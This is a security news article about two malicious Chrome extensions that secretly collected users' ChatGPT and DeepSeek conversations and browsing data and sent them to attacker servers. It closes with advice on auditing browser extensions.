Jan 26, 2026 · 5 min read
These Chrome Extensions Were Stealing Your ChatGPT Conversations
Security researchers discovered two popular browser extensions secretly exfiltrating AI chatbot conversations to remote servers every 30 minutes. The extensions had over 900,000 combined users.
The Extensions That Harvested Your AI Chats
Two malicious Chrome extensions were discovered on the Chrome Web Store, masquerading as AI productivity tools while secretly siphoning off everything users typed into ChatGPT and DeepSeek:
- Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI — 600,000 users
- AI Sidebar with Deepseek, ChatGPT, Claude, and more — 300,000 users
The extensions functioned as advertised, providing AI chat features to users. But behind the scenes, they were running a parallel operation: extracting conversation content from the DOM, storing it locally, and transmitting it to command and control servers every 30 minutes.
How the Attack Worked
Security researcher Moshe Siman Tov Bustan from OX Security discovered the malicious behavior and documented the technique, which he termed "Prompt Poaching." The extensions used a deceptively simple approach.
When installed, the extensions requested permission to collect "anonymous, non-identifiable analytics data." Users who clicked through the permission prompt unknowingly authorized complete access to their AI conversations. The extensions then:
- Monitored tabs for ChatGPT and DeepSeek sessions
- Extracted conversation content directly from page elements
- Captured all Chrome tab URLs and browsing activity
- Stored data locally before batch transmission to C2 servers
- Transmitted harvested data every 30 minutes to domains including chatsaigpt[.]com and deepaichats[.]com
What Data Was Stolen
The stolen information went far beyond simple browsing history. Compromised data included:
- Complete AI conversations: Every prompt and response from ChatGPT and DeepSeek sessions
- Web browsing activity: All URLs visited across Chrome tabs
- Search queries: What users were searching for
- Internal corporate URLs: Company intranet and internal tool addresses
The implications are significant. Many users share sensitive information with AI chatbots: code snippets, business strategies, personal details, confidential documents, even credentials. All of this was being harvested and sent to attacker controlled servers.
The Infrastructure Behind the Attack
The attackers demonstrated sophistication in building a convincing facade. They used Lovable, an AI web development platform, to generate legitimate looking privacy policy pages hosted at chataigpt[.]pro and chatgptsidebar[.]pro. These pages made the extensions appear trustworthy to users who bothered to check.
The command and control infrastructure used domain names designed to blend in with legitimate AI services. Users who noticed network traffic to "chatsaigpt.com" might assume it was related to the ChatGPT functionality they had installed.
Why This Attack Matters
This attack represents a new frontier in data theft. As AI assistants become integrated into daily workflows, they become repositories for sensitive information that users might not share elsewhere. Conversations with AI chatbots often contain:
- Proprietary code and technical documentation
- Business plans and strategic thinking
- Personal health questions and concerns
- Financial information and investment strategies
- Legal questions revealing sensitive situations
The stolen data could be used for corporate espionage, targeted phishing campaigns, identity theft, or sold on underground forums. An attacker with access to months of AI conversations has a detailed profile of the victim's work, interests, and vulnerabilities.
Protecting Yourself from Malicious Extensions
If you installed either of these extensions, remove them immediately and assume any conversations you had with AI chatbots while they were installed have been compromised. Change any passwords or credentials you may have shared in those conversations.
To reduce your risk going forward:
- Audit your extensions: Go to chrome://extensions and review what you have installed. Remove anything you don't actively use.
- Check permissions: Be suspicious of extensions requesting broad permissions like "Read and change all your data on all websites."
- Prefer official tools: Use ChatGPT and DeepSeek through their official websites or apps rather than third party extensions.
- Review before installing: Check the developer's history, read recent reviews, and look for red flags like vague privacy policies.
- Treat AI chats as non-private: Even without malicious extensions, AI providers may retain and train on your conversations. Never share credentials, API keys, or highly sensitive information in AI chats.
The Broader Extension Security Problem
This incident is part of a larger pattern. A Stanford University study found that over 346 million users installed "security noteworthy extensions" over a three year period—extensions containing malware, violating privacy policies, or harboring known vulnerabilities. Even more troubling: 42% of extensions with known vulnerabilities remained live and exploitable two years after disclosure.
The Chrome Web Store's review process catches many threats, but malicious actors continuously adapt. Extensions that pass initial review can later receive updates that introduce malicious functionality, or attackers may purchase legitimate extensions from their developers and then push malicious updates to the existing user base.
The safest approach is to minimize extension usage to only what you genuinely need, regularly audit what's installed, and maintain healthy skepticism about any extension requesting broad permissions.